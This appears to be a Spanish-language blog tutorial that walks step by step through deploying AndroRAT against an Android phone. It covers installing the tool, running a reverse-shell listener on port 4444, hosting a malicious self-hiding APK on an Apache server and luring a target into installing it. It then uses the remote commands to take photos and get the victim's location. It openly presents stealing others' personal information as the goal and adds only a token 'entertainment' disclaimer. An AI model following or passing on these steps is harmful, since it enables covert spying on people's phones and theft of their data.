Los piratas informáticos en este mundo están observando sus actividades a diario e intentarán arrebatarle su información personal u otro tipo de cosas personales. Usaremos un método de piratería que es phishing para nuestro blog de hoy. AndroRat es una herramienta diseñada para dar el control del sistema android de forma remota y recuperar información del mismo. Lo bueno es que después de instalar este apk, su archivo apk se oculta y nadie puede ver este archivo. La herramienta que utilizaremos es AndroRAT.
Companies Mentioned
Hay muchos piratas informáticos en este mundo que pueden estar observando sus actividades diariamente e intentarán robar su información personal.
¡Y hoy, te mostraré cómo hacer precisamente eso!
Requisito previo
Github instalado
Python3 instalado
pipa instalada
java instalado
La dirección IP de su máquina
Sistema Linux
Comencemos nuestro Hacking
Usaremos un método de piratería que es phishing para nuestro blog de hoy. Puede obtener más información sobre el phishing en Wikipedia. La herramienta que usaremos es AndroRat.
AndroRAT es una herramienta diseñada para dar el control del sistema Android de forma remota y recuperar información del mismo. Androrat es una aplicación cliente/servidor desarrollada en Java Android para el lado del cliente y el servidor está en Python. Una herramienta simple de administración remota de Android usando sockets. Utiliza java en el lado del cliente y python en el lado del servidor
Clone el repositorio que se indica a continuación.
Vaya al directorio donde ha clonado el repositorio mediante el comando cd .
cd <Directory_name>AndroRat
En nuestra carpeta AndroRat, hay 9 subcarpetas y trabajaremos con el archivo de extensión .py.
Avanzando más, ahora tenemos que instalar algunos requisitos para nuestra instalación por pip Al usar el comando pip, podemos instalar bibliotecas de paquetes de python con un solo clic.
Requisitos de instalación
pip install -r requirements.txt
Hemos satisfecho nuestros requisitos para nuestro sistema.
También podemos verificar qué requisitos se necesitan escribiendo el comando dado
cat requirements.txt
Construyendo un archivo apk malicioso para espiar
Construiremos un archivo apk malicioso que se necesita instalar en el teléfono de destino y lo bueno es que después de instalar este apk, su archivo apk se oculta y nadie puede ver este archivo. ¿Guay, verdad?
Construyamos este archivo malicioso
para construir este apk, debe escribir el comando que se indica a continuación
-i → Dirección IP de su sistema y, en caso de que no sepa la dirección IP de su sistema, escriba el siguiente comando.
ifconfig
Si no sabe dónde está escrita la dirección IP de su máquina en la salida dada por ifconfig, entonces debe buscar 192 números prefijados en su salida de ifconfig.
-p - número de puerto
-o archivo de salida
La salida debe verse como la imagen que se muestra a continuación.
Ahora es el momento de alojar al oyente.
Todo lo que tienes que hacer es escribir el código que se muestra a continuación.
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
Ahora regrese a otra terminal, escriba otro comando para iniciar el servidor web apache
sudo systemctl status apache2.service
Ahora, copiemos nuestro archivo y enviémoslo a la web escribiendo el siguiente comando
sudo cp piyush.apk /var/www/html/
Ahora, escriba lo siguiente en el móvil de destino y debería descargar su apk
<ip_address>/piyush.apk
Después de descargar el archivo apk, instálelo y ábralo para aceptar todos los permisos, ¡y se acabó el juego!
Cuando eche un vistazo al oyente, obtendrá esta interfaz.
Ahora, escriba 'ayuda' y presione enter. Obtendrá los comandos y podrá hacer lo siguiente.
Por ejemplo, si desea tomar una foto del móvil de destino, escriba el comando 'tomar foto'. Si desea obtener su ubicación, escriba el comando 'getLocation'.
Este blog fue con fines de entretenimiento, no intentes hacer nada poco ético con él porque siempre eres responsable de tus acciones.
Para anónimo, no intentes hackear mi dirección IP, ya la he cambiado.